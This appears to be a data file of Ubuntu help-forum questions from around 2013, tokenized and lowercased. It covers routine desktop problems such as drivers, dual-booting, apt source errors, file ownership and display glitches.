291144	how do i turn off thumbnails for pdf files ?	when i open org.gnome.desktop.thumbnailers using dconf-editor , i see this : schema : `org.gnome.desktop.thumbnailers` summary : list of mime-types for which external thumbnailer programs will be disabled description : thumbnails will not be created for files whose mime-type is contained in the list . type : as default : [ ] when i enter [ application/pdf ] as shown in the image i get an error . entering just application/pdf also gives me a similar error . my questions are : what is meant by `` external thumbnailer program '' ? i have not installed any such thing . is org.gnome.desktop.thumbnailers the appropriate schema to use to turn off thumbnails for pdf files generated presumably by default ? if not , is there any way to stop pdf file thumbnails from being generated ? i 'm using thunar as file manager and xfdesktop instead of pcmanfm on lubuntu 13.04..
291145	adding ebook format ( epub/mobi ) support to document viewer	is there any way to add support for epub & mobi to the default document viewer in ubuntu ? calibre is an overkill for me there is any other small and light software out there ?
291146	difference between linux headers , linux images , and the generic versions	i am curious to know the difference between the large number of linux kernel files that come when a kernel is installed , namely , the follows : linux-headers-x.x.x-x linux-headers-x.x.x-x-generic linux-image linux-image-x.x.x-x-generic i would also like to whether there are similar files and the difference between those too . update : i have seen the question below , but it does not seem to answer the question completely : why are there so many `` linux- '' kernel packages on my machine , and what do they all do ?
291151	did 13.04 fix the resetting shortcut bug ?	i have experienced this problem in both 12.04 and 12.10. https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/964270 ( 12.04 ) https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/1063617 ( 12.10 and later ) i 'm wondering if someone could confirm that this bug is fixed in 13.04 . if it 's not , i probably wo n't upgrade . that 's my only annoyance with 12.10 now . thanks .
291155	empathy does n't show all notifications	in 13.04 , empathy does n't show all the bubble notifications and it ca n't be configured . in the preferences , i can only configure sounds notifications but not visuals . empathy only shows bubble notifications when someone sends me a message , but not when someone gets connected or disconnected ( in these cases i can hear a sound but without a bubble ) . 多is there a way to turn all the notifications on ?
291159	display glitches	i recently came across a ppc g5 and wanted to install lubuntu on it so i dban 'd the original hdd and loaded up my 12.10 lubuntu boot dvd and all was well until i clicked on the `` install lubuntu '' icon . when i click it a null window comes up . it says `` install '' in the very center but other than that , nothing else is visible . i clicked the x to close it out and the `` quit the installation ? '' box appears also with nothing else visible . luckilyi knew to hit tab and enter ( to execute the no command ) . i tried to refresh it , to reboot the system and it still comes up as a blank window with no options . several other windows do the same thing , like setting up the network , etc . luckily firefox opens , but the home page is iffy with pixelated graphics . the main desktop looks a tad pixelated as well . g5 specs ppc g5 , 2.5 dp pci-x ppc 970fx 4gb ddr1 pc3200 160.0gb 7200rpm hdd ati radeon 9600 xt ( agp 8x pro ) video card i tried to screen shot it but shutter would n't display nor would mtpaint graphic editor . basically just picture the dvd boot desktop with `` install ubuntu 12.10 '' icon in the upper left corner , i click on it and it opens a blank box ( just a border with title at the top ) inside the border i see whatever was behind it , i.e . the desktop walpaper/xterm , etc . an when i click on the install display box and drag it around the desktop , the image gets all f 'd up . i click x to close it and another blank bordered box with title appears and i know to hit tab then enter to quit the installation process . my thoughts were the graphics card but i 'm not positive how to get the drivers for it outside of xterm which did n't seem to work when i tried . i got the latest mesa-utils and ran glxgears to check my fps and am pulling between 237 and 303 fps . i followed another post at phoronix.com/forums/showthread.php ? 50038-updated-and-optimized-ubuntu-free-graphics-drivers and to no avail received errors in the process . this is my first ubuntu mac machine i 've attempted so any pointers would be greatly appreciated . i guess i failed to mention , the purpose of this post is i would like to get lubuntu mounted to the hdd on this g5 ...
291161	would booting 12.04 from external hdd give me problems for developing kernels for android 4.12 and 4.2.2 ?	the laptop specifications are : lenovo z580 3.0usb would it give any foreseen performance problems ?
291162	how can i get a messaging menu indicator with unread count of my new gmail emails ?	back in ubuntu 12.04 , installing the gm-notify application allowed did these things : shoe me the number of unread messages in my inbox show me a blue envelope when an email was received show me a notification when an email was received i have done a fresh install of ubuntu 13.04 and installed and configured gm-notify , and it only shows me a notification . the messaging menu no longer has an inbox count and no longer turns blue . what can i do to restore the old behavior and get blue icons as well as an inbox count in the system tray ? if there 's a bug in gm-notify or in ubuntu 13.04 , is there an alternative to accomplish this ? please note - i am aware of the gmail unity webapp but that requires the browser to remain open and is overall too problematic , and i would like to find out how to restore the blue envelope + message count functionality .
291163	how do i get wifi working in 13.04 on dell vostro 2420 ?	the vostro 2420 came with ubuntu 11.10 out of the box , and when i installed kubuntu 12.10 i lost wifi . so i found this solution and followed it and got wifi working . now i just upgraded to kubuntu 13.04 and wifi no longer works . lcpci shows the following : broadcom corporation bcm43142 802.11b/g/n ( rev 01 )
291165	sound problems after upgading to 13.04	after my recent upgrade to 13.04 i am experiencing background crackling noises , particularly noticeable when using my preferred listening over headphones ( grado sr80 's ) . the noise is only evident when audio is playing from any source ( banshee , clementine , dvd drive , chromium eg you tube ) . as soon as music stops so does the crackle . the noise may best be likened to the crackle i used to get as background when listening to vinyl records over headphone . otherwise the quality of audio is unimpaired . i usually use the headphones via a asus xonar u3 usb soundcard/headphone amp but the crackle is also evident when using my laptop 's inbuilt headphone jack outlet . the problem was certainly not evident before the upgrade i.e . when using 12.04 or 12.10 . my laptop is dual boot and the problem is not apparent under windows 7 ( although i much prefer the linux environment , current sound issues aside ) . this would appear to point to a ubuntu sound issue . any suggestions how this may be resolved ?
291173	how does synaptic package manager work ?	i always wondered how the synaptic package work ? i always wanted to know it 's secrets . can someone tell me ?
291175	13.04 desktop does not fully load	i am not sure what i am doing wrong . i followed the install steps perfectly but everytime i log into my username it wont load anything . its just the desktop . the top bar disappears and there is no side bar . i can access the settings by right clicking and editing my desktop but i have no idea what to do . can someone tell me if there is a fix for this ? i am using a dell dimension 2400
291177	file operations freeze when putting files larger than 10mb on an sd card	i have the newest ubuntu 13 with all updates . when copying files to my 32gb sd card , the file operations freeze just before it finishes . it does not complete . files greater than 10mb do this . smaller files have no problems .
291180	problem connecting to vpn network on ubuntu 13.04	i have a problem setting up the pptp vpn i got on linux . i have set it up as it follows here : hideipvpn.com/2010/01/linux-pptp-vpn-setup-tutorial/ but unfortunately i am getting the error shown in the screenshot : http : //i.imgur.com/stovyno.png i am using ubuntu-gnome 13.04 as my distribution . thanks .
291182	how do i install ubuntu 13 without risking damage to windows 8 ?	i am trying to install ubuntu 13 on my laptop , which came with windows 8 . it also came with an empty partition , along with the three that windows 8 uses . i want to install ubuntu on that partition . i booted a live usb pretty easily , but on the install screen , it asked where to install the bootloader . i am fine with using grub instead of the windows bootloader , but i want to be able to revert anything in case i screw up . if i install grub to the hard drive , does it delete the windows bootloader , or does it just point to grub ? i would also like to know if i can install ubuntu and not grub . my only experience is when i installed , but did not dual-boot , my desktop with linux mint 14 . this is my first question , so please feel free to ask for information i have left out.thank you in advance for your help .
291183	uninstalling ubuntu . which partitions to delete ?	i installed ubuntu successfully , however something went wrong and i could boot neither ubuntu or windows 8 , i was forced to reset the computer . i now believe ubuntu and all its associated software is gone , and now i just need to delete the partitions it was on . however , i do not know which partitions to delete without damaging windows . my partitions in disk management look like this . ubuntu automatically made the partitions during the installation and i do not know which ones to remove . for now i no longer want ubuntu , though i may come back to it at a later date .
291185	i can not get the localhost webserver on firefox to display jpg or jpeg files	i am running ubuntu 12.04 lts and firefox . i can not display jpg files when browser starts up . but if i click on icon there is no problem . i am attaching a few screen shots . am adding display from `` env '' . /usr/lib/icons/tm $ identify query.jpg query.jpg jpeg 236x42 236x42+0+0 8-bit directclass 2.6kb 0.000u 0:00.000 env ssh_agent_pid=1894 gpg_agent_info=/tmp/keyring-12oggk/gpg:0:1 term=xterm shell=/bin/bash xdg_session_cookie=23cbfe42352526df1a184da90000000a-1367744391.998295-447140937 ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so windowid=60818196 gnome_keyring_control=/tmp/keyring-12oggk user=syedk jre_home=/usr/local/java/jre1.7.0_10 ls_colors=rs=0 : di=01 ; 34 : ln=01 ; 36 : mh=00 : pi=40 ; 33 : so=01 ; 35 : do=01 ; 35 : bd=40 ; 33 ; 01 : cd =40 ; 33 ; 01 : or=40 ; 31 ; 01 : su=37 ; 41 : sg=30 ; 43 : ca=30 ; 41 : tw=30 ; 42 : ow=34 ; 42 : st=37 ; 44 : ex=0 1 ; 32 : *.tar=01 ; 31 : *.tgz=01 ; 31 : *.arj=01 ; 31 : *.taz=01 ; 31 : *.lzh=01 ; 31 : *.lzma=01 ; 31 : * . tlz=01 ; 31 : *.txz=01 ; 31 : *.zip=01 ; 31 : *.z=01 ; 31 : *.z=01 ; 31 : *.dz=01 ; 31 : *.gz=01 ; 31 : *.lz =01 ; 31 : *.xz=01 ; 31 : *.bz2=01 ; 31 : *.bz=01 ; 31 : *.tbz=01 ; 31 : *.tbz2=01 ; 31 : *.tz=01 ; 31 : *.d eb=01 ; 31 : *.rpm=01 ; 31 : *.jar=01 ; 31 : *.war=01 ; 31 : *.ear=01 ; 31 : *.sar=01 ; 31 : *.rar=01 ; 31 : *.ace=01 ; 31 : *.zoo=01 ; 31 : *.cpio=01 ; 31 : *.7z=01 ; 31 : *.rz=01 ; 31 : *.jpg=01 ; 35 : *.jpeg=0 1 ; 35 : *.gif=01 ; 35 : *.bmp=01 ; 35 : *.pbm=01 ; 35 : *.pgm=01 ; 35 : *.ppm=01 ; 35 : *.tga=01 ; 35 : *.x bm=01 ; 35 : *.xpm=01 ; 35 : *.tif=01 ; 35 : *.tiff=01 ; 35 : *.png=01 ; 35 : *.svg=01 ; 35 : *.svgz=01 ; 35 : *.mng=01 ; 35 : *.pcx=01 ; 35 : *.mov=01 ; 35 : *.mpg=01 ; 35 : *.mpeg=01 ; 35 : *.m2v=01 ; 35 : *.mk v=01 ; 35 : *.webm=01 ; 35 : *.ogm=01 ; 35 : *.mp4=01 ; 35 : *.m4v=01 ; 35 : *.mp4v=01 ; 35 : *.vob=01 ; 3 5 : *.qt=01 ; 35 : *.nuv=01 ; 35 : *.wmv=01 ; 35 : *.asf=01 ; 35 : *.rm=01 ; 35 : *.rmvb=01 ; 35 : *.flc=0 =01 ; 35 : *.yuv=01 ; 35 : *.cgm=01 ; 35 : *.emf=01 ; 35 : *.axv=01 ; 35 : *.anx=01 ; 35 : *.ogv=01 ; 35 : * .ogx=01 ; 35 : *.aac=00 ; 36 : *.au=00 ; 36 : *.flac=00 ; 36 : *.mid=00 ; 36 : *.midi=00 ; 36 : *.mka=00 ; 36 : *.mp3=00 ; 36 : *.mpc=00 ; 36 : *.ogg=00 ; 36 : *.ra=00 ; 36 : *.wav=00 ; 36 : *.axa=00 ; 36 : *.oga =00 ; 36 : *.spx=00 ; 36 : *.xspf=00 ; 36 : xdg_session_path=/org/freedesktop/displaymanager/session0 xdg_seat_path=/org/freedesktop/displaymanager/seat0 ssh_auth_sock=/tmp/keyring-12oggk/ssh session_manager=local/syedk-thinkpad-t410 : @ /tmp/.ice-unix/1859 , unix/syedk-thinkp ad-t410 : /tmp/.ice-unix/1859 defaults_path=/usr/share/gconf/ubuntu.default.path xdg_config_dirs=/etc/xdg/xdg-ubuntu : /etc/xdg path=/usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/syedk/bin : /usr/local/java/jdk1.7.0_10/bin : /home/syed k/bin : /usr/local/java/jre1.7.0_10/bin desktop_session=ubuntu pwd=/usr/lib/icons/tm java_home=/usr/local/java/jdk1.7.0_10 gnome_keyring_pid=1848 lang=en_us.utf-8 mandatory_path=/usr/share/gconf/ubuntu.mandatory.path ubuntu_menuproxy=libappmenu.so compiz_config_profile=ubuntu gdmsession=ubuntu shlvl=1 home=/home/syedk gnome_desktop_session_id=this-is-deprecated logname=syedk xdg_data_dirs=/usr/share/ubuntu : /usr/share/gnome : /usr/local/share/ : /usr/share/ dbus_session_bus_address=unix : abstract=/tmp/dbus-u7zeu2sfyq , guid=b42a287c3f51591 210fff2d700000019 lessopen=| /usr/bin/lesspipe % s display=:0.0 xdg_current_desktop=unity lessclose=/usr/bin/lesspipe % s % s colorterm=gnome-terminal xauthority=/home/syedk/.xauthority oldpwd=/usr/lib/icons _=/usr/bin/env
291188	rebooting problem	after experiencing these problems why is my desktop background blank after upgrade to 13.04 ? , unity is n't working after running `unity -- replace` i realised my best bet would be to uninstall ubuntu and reinstall from scratch . so i logged out of ubuntu ( after backing up the files i needed , of course ) and into my windows 7 os and removed the partition on which ubuntu had been and downloaded the 13.04 iso file for 32 bit operating systems like the one i had previously burned it to a disk and then i rebooted but when i rebooted i received a grub error , `` error : unknown file system '' and the next line had `` grub rescue > '' . please help me i have no idea of where to go from here . i tried typing , 'f12 ' to boot from my livecd instead of my harddrive but this resulted in the same grub rescue screen . i also tried taking the cd out of the drive to see if it would do anything and it did n't . i know next to zilch when it comes to programming so please just tell me , step-by-step , what i need to do . i am using a dell vostro 3500 laptop with 4x3.7ghz processors and 4gb ( i think ) ram .
291191	unable to show popups dialog in tab with webview	my app uses tabs , and one of them shows a web page using webview . now , i have a toolbar with one action button that i want to show a dialog - but it 's no go . instead i get this error message when pressing the action button : file : ///usr/lib/x86_64-linux-gnu/qt5/qml/ubuntu/components/popups/popuputils.js:50 : error : can not assign qobject* to qquickitem* showing in a tab whitout a webview works fint with the same component and dialog . why does it not work , and what should i do to make it possible ? i 'd really want this dialog there . here 's part of my code : // change coordinates dialog component { id : dialog dialog { id : dialogue title : `` save file '' text : `` are you sure that you want to save this file ? '' // x textfield { id : xcoo width : units.gu ( 20 ) placeholdertext : 'x' text : xcurrent } // y textfield { id : ycoo width : units.gu ( 20 ) placeholdertext : 'y' text : ycurrent } button { id : 'gobutton' text : 'go' color : 'green' onclicked : { xcurrent = xcoo.text ycurrent = ycoo.text popuputils.close ( coodialog ) } } } } webview { id : mapcontent anchors.fill : parent url : `` http : //webpage.html '' smooth : true scale : 1 visible : true } and the action : // change coordinates action { id : coordinateaction objectname : `` action2 '' iconsource : qt.resolvedurl ( `` toolbaricon.png '' ) text : i18n.tr ( `` coordinates '' ) ontriggered : { popuputils.open ( dialog , coordinateaction ) } }
291192	change drivers 13.04	i have just upgraded to 13.04 , and i 'm noticing that the graphics are n't as smooth as they were in 12.04 , and there is no driver option in the settings menu . is there a way to change the driver ? i have an nvidia quadro nvs 135m and i used the `` recommended '' driver for it in the additional drivers . thanks !
291193	ubuntu and fat partition , why and can i change it ?	i have a mac from 2006 and it is already not supported by new apple system . so i did get back to linux and i did chose ubuntu 13.04 . i did install ubuntu side by side with osx , but i did notice that ubuntu did install itself on fat partition . why ubuntu uses fat partition ? and can i change it to ext4 without loosing already configured data ?
291198	ffmpeg for 13.04	i have a question how to get ffmpeg with x264 support for ubuntu 13.04 i used to use this ppa https : //launchpad.net/~jon-severinsson/+archive/ffmpeg but as far as i understand 13.04 is not supported so any other way to get it ? ? thank you in advanced
291199	ubuntu 13.04 - installation nvidia driver	i 've installed ubuntu 13.04 on my laptop hp 6720s with video card intel 965 chipset intel gma x3100 . after the boot the classic purple screen appear and before the login page the screen become black and the pc remain freezed . for all last versions of ubuntu the following commands repaired the situation : recovery mode with network : apt-get remove -- purge nvidia* rm /etc/x11/xorg.conf apt-get update apt-get recovery mode again : apt-get install nvidia-current nvidia-xconfig reboot but for the 13.04 version it does n't work . thank you in advance !
291203	ubuntu 12.04.2 on lenovo laptop	in looking through the system error logs to find out why my laptop sometimes will not suspend i ran across this which is unrelated . however , could it be a problem indirectly related to a sleep issue . may 5 16:09:43 lenovon580laptop kernel : [ 15.783885 ] qualcomm atheros ( r ) ar816x/ar817x pci-e ethernet network driver may 5 16:09:43 lenovon580laptop kernel : [ 15.787516 ] lp : driver loaded but no devices found may 5 16:09:43 lenovon580laptop kernel : [ 15.795073 ] alx 0000:01:00.0 : alx ( b8:88 : e3:84:38:33 ) : qualcomm atheros ethernet network connection may 5 16:09:43 lenovon580laptop kernel : [ 15.795132 ] acpi warning : 0x0000000000000460-0x000000000000047f systemio conflicts with region \pmio 1 ( 20120320/utaddress-251 ) may 5 16:09:43 lenovon580laptop kernel : [ 15.795139 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 5 16:09:43 lenovon580laptop kernel : [ 15.795141 ] lpc_ich : resource conflict ( s ) found affecting itco_wdt
291205	remote desktop & launcher ( .exe )	1 ) what are clear steps for being able to remote into my ubuntu box from my windows 7 box ? 2 ) is there a way to have a .exe be attached to my left-hand launch bar ?
291206	install ubuntu 13.04 alongside windows 8	i want windows 8 64bit ( system-builders ) and ubuntu linux 13.04 on different partitions on the same drive in my new self-built machine . i 've previously been using only ubuntu 12.04lts and no once my win8 dvd came from ms , i want to upgrade to 13.04 anyway . i am already completely backed up and ready to migrate , but i do n't want to run into bootloader or restrictedboot problems as i keep reading about online . what do i have to do to make them play well and boot ? i 'm supposed to install ubuntu first , right ? what else ? i found a bunch of tutorials , but they all want me to use easybcd ( http : //neosmart.net/easybcd/ ) but that is n't foss , and i would much rather use open source stuff to boot my open source os ... i 've read through a bunch of posts similar to : install windows 8 alongside with ubuntu ubuntu alongside windows 8 thanks
291217	gnome terminal transparency broken in 13.04 in parallels vm	i just upgraded to 13.04 from 12.10 in a 64-bit parallels vm , and the semi-transparent terminal windows i configured for gnome terminal are now totally opaque . i 'm setting transparency via edit - > profile preferences - > background - > transparent background . this is also illustrated in http : //www.ubuntugeek.com/howto-create-a-transparent-terminal-in-ubuntu-desktop.html . adjusting the slider has no effect . any workarounds ?
291221	error with 'tar ' commad , `` can not open : no such file or directory ''	i am trying to connect my xbox with my laptop using ushare . for that i am following exactly what i have to do according to installation of ushare on ubuntu documentation . unfortunately , at step 3 something goes wrong . using the following code : sudo tar -jxvf ushare-11a-netou.tar.bz2 gives me this error : tar ( child ) : ushare-11a-netou.tar.bz2 : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now
291225	how do i change how much disk space ubuntu has ?	i installed chrubuntu on my chomebook acer c7 about 2 weeks ago and i chose to allocate 10 gigs . i did n't know that that would be my amount of disk space i would be allowed to use . i want to install adobe after effects and it will not allow me due to the fact that i do n't have enough disk space . i do know i have plenty of disk space because i own a 320g hard drive . could someone please tell me how to change the amount of disk space i allocate for ubuntu ? ( it was the time where when installing ubuntu it asked me how much space i wanted 1-299 , and i chose 10 )
291231	problems with duplicate sources . help ?	i am having some trouble with duplicate sources when trying to update version from 12.10 to 13.04 : ( here is my sources list , and then below that you can find the errors i get from the terminal : ubuntu main repos deb http : //de.archive.ubuntu.com/ubuntu/ quantal main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal main restricted universe multiverse ubuntu update repos deb http : //de.archive.ubuntu.com/ubuntu/ quantal-security main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ quantal-proposed main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-security main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-proposed main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //ppa.launchpad.net/jonabeck/ppa/ubuntu karmic main deb-src http : //ppa.launchpad.net/jonabeck/ppa/ubuntu karmic main ubuntu partner repo deb http : //archive.canonical.com/ubuntu quantal partner deb-src http : //archive.canonical.com/ubuntu quantal partner ubuntu extras repo deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main now this is what terminal shows me when trying to update : w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ quantal/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_quantal_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ quantal/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_quantal_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems can somebody tell me which sources i have to delete in order to update my version ?
291232	java ca n't launch minecraft , these errors happen . using java oracle	these errors happen when i launch minecraft , first error happens when i launch the login menu ( it still boots up ) . second when i actually launch the game . landswimmer @ linux-99vz : ~/documents/minecraft/vanilla > java -jar minecraft.jar asdf java.io.filenotfoundexception : /home/landswimmer/.minecraft/lastlogin ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream. < init > ( fileinputstream.java:138 ) at net.minecraft.loginform.readusername ( loginform.java:110 ) at net.minecraft.loginform. < init > ( loginform.java:55 ) at net.minecraft.launcherframe. < init > ( launcherframe.java:23 ) at net.minecraft.launcherframe.main ( launcherframe.java:167 ) at net.minecraft.minecraftlauncher.main ( minecraftlauncher.java:13 ) exception in thread `` thread-4 '' java.lang.unsatisfiedlinkerror : /home/landswimmer/.minecraft/bin/natives/liblwjgl.so : /home/landswimmer/.minecraft/bin/natives/liblwjgl.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1825 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at org.lwjgl.sys $ 1.run ( sys.java:69 ) at java.security.accesscontroller.doprivileged ( native method ) at org.lwjgl.sys.doloadlibrary ( sys.java:65 ) at org.lwjgl.sys.loadlibrary ( sys.java:81 ) at org.lwjgl.sys. < clinit > ( sys.java:98 ) at net.minecraft.client.minecraft.g ( sourcefile:1985 ) at awe. < init > ( sourcefile:20 ) at net.minecraft.client.minecraft. < init > ( sourcefile:76 ) at avv. < init > ( sourcefile:38 ) at net.minecraft.client.minecraftapplet.init ( sourcefile:38 ) at net.minecraft.launcher.replace ( launcher.java:136 ) at net.minecraft.launcher $ 1.run ( launcher.java:79 )
291238	wireless connected but slow	i am connected to the wireless but the speed oscillates a lot , sometimes it does not work at all . a restart usually fixes it , which i find pretty weird . i know it is not the modem because i have other machines working fine . can someone give me a clue ? here goes a lspci and a iwconfig thanks in advance eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' naboo '' mode : managed frequency:2.422 ghz access point : 1c : af : f7:5b:5c:8c bit rate=57.8 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=37/70 signal level=-73 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:2039 invalid misc:472 missed beacon:0 and also lspci -nnk | grep -ia2 net 01:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088e ] ( rev 24 ) subsystem : intel corporation centrino advanced-n 6235 agn [ 8086:4060 ] kernel driver in use : iwlwifi -- 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : samsung electronics co ltd device [ 144d : c0d7 ] kernel driver in use : r8169
291241	13.04 authenticate fail after install	i have burned an amd64.iso ( with all the files showing ) , and run an installation off of boot after changing bios to permit that and checking the dvd for errors . upon completion of the first installation , on reboot i received the message : `` selected boot image did not authenticate . '' i requested i hit enter to continue , and doing so shut the laptop down . i repeated the install removing the prior install , and received the same message . i am now using the temporary version , and have installed from it again . i fear a repeat of the message . i am now working with a computer on which windows 8 has been deleted and ubuntu is not working . what do you suggest is wrong ?
291244	asus windows 8 desktop dual boot is not working	asus windows 8 desktop dual boot is not working - after i download tbe ubuntu iso file and burn onto a cd , and select the boot sequence priority as cd , it wo n't come up . showing that load valid one into boot device . help is appreciated..
291248	recovering sudo/recovering root ownership on system directories -- how ? possible ?	i 'm trying to find out the default ownership & permissions for my ubuntu install . i 'm also trying to figure out whether the wrong-headed granted of file ownership to the user robert to system files is an irrecoverable error . is it too complicated to try to undo what i have done for my system and just reinstall ? first , some background . i think i made the wrong command when i was trying to change the permissions on a 2nd ext4 drive which formerly had ubuntu installed on it . i must have inadvertently made changes to my current / directory without realizing it . symptoms of the problem is that i no longer have sudo access on my current system . robert @ robert-kj379aa-aba-a6400f : / $ sudo ls -al sudo : /etc/sudoers is owned by uid 1000 , should be 0 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin i see that `` robert '' now owns all the files inside /etc : examples : drwxr-xr-x 3 robert root 4096 apr 9 12:27 firefox drwxr-xr-x 4 robert root 4096 aug 23 2012 fonts drwxr-xr-x 3 robert root 4096 aug 23 2012 foomatic -rw-r -- r -- 1 robert root 766 apr 11 12:39 fstab -rw-r -- r -- 1 robert root 664 apr 9 11:26 fstab~ drwxr-xr-x 2 robert root 4096 mar 29 2012 fstab.d -rw-r -- r -- 1 robert root 664 apr 11 12:36 fstab.original -rw-r -- -- - 1 robert fuse 216 oct 18 2011 fuse.conf -rw-r -- r -- 1 robert root 3343 apr 19 2012 gai.conf drwxr-xr-x 5 robert root 4096 aug 23 2012 gconf here are the permissions and ownership for the / directory drwxr-xr-x 25 root root 4096 may 5 15:26 . drwxr-xr-x 25 root root 4096 may 5 15:26 .. drwxr-xr-x 2 robert root 4096 apr 10 22:55 bin drwxr-xr-x 3 robert root 4096 may 5 15:26 boot drwxr-xr-x 2 robert root 4096 apr 9 11:30 cdrom drwxr-xr-x 15 root root 4560 may 5 17:28 dev drwxr-xr-x 150 robert root 12288 may 5 17:45 etc drwxr-xr-x 3 robert root 4096 apr 9 11:37 home lrwxrwxrwx 1 robert root 33 may 5 15:26 initrd.img - > /boot/initrd.img-3.2.0-41-generic lrwxrwxrwx 1 robert root 33 apr 9 12:26 initrd.img.old - > /boot/initrd.img-3.2.0-40-generic drwxr-xr-x 22 robert root 4096 apr 24 16:58 lib drwxr-xr-x 2 robert root 4096 apr 24 16:58 lib64 drwx -- -- -- 2 robert root 16384 apr 9 11:26 lost+found drwxr-xr-x 5 root root 4096 may 5 17:28 media drwxr-xr-x 2 root root 4096 apr 19 2012 mnt drwxr-xr-x 2 root root 4096 aug 23 2012 opt dr-xr-xr-x 198 root root 0 may 5 12:26 proc drwx -- -- -- 8 root root 4096 apr 17 02:11 root drwxr-xr-x 23 root root 820 may 5 17:43 run drwxr-xr-x 2 root root 4096 apr 24 16:58 sbin drwxr-xr-x 2 root root 4096 mar 5 2012 selinux drwxr-xr-x 2 root root 4096 aug 23 2012 srv drwxr-xr-x 13 root root 0 may 5 12:27 sys drwxrwxrwt 10 root root 4096 may 5 19:37 tmp drwxr-xr-x 10 root root 4096 aug 23 2012 usr drwxr-xr-x 14 root root 4096 may 5 17:26 var lrwxrwxrwx 1 root root 29 may 5 15:26 vmlinuz - > boot/vmlinuz-3.2.0-41-generic lrwxrwxrwx 1 root root 29 apr 9 12:26 vmlinuz.old - > boot/vmlinuz-3.2.0-40-generic drwxrwxr -- 1 robert robert 4096 apr 9 01:37 windows1 can anyone confirm that `` robert '' must not own any of these directories just below root ? is there anything here to suggest that the problem may be easy to recover from ? if yes , do you have any advice or resources for how to fix this ? thanks .
291252	error while updating- encountered a session with no package:	reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i get this message whenever i update or install any software . pls help me out : )
291263	i installed then deleted gnome and ubuntu desktop , now stuff is n't working correctly	i did : sudo apt-get install gnome and realized it was n't what i was after . i then did : sudo apt-get remove gnome* and it jacked stuff up . i got my system back usable with : apt-get install -- reinstall ubuntu-desktop from recovery mode and installed the fgrlx drivers to get my panel back . i used ati drivers before , but they are n't showing up under additional drivers . so , i installed them from the amd website per googled instructions . unity still is n't working like it was . ubuntu tweak does n't have as many options , my workspace switcher looks different , the top bar is more gnomish looking , and the dash is about 2/3 the screen instead of full screen . how can i get my desktop back to out of the box settings ? i 'd like to keep all my installed apps and files though .
291268	does live usb 3 work faster than a live usb 2	i have bought a new notebook which has one usb2 and 2 usb3 . i wan na ask if i buy a usb 3 flash disk and make it a live usb , would this live usb ( usb 3.0 ) work 10 times faster than live usb ( usb 2 ) ? thanks
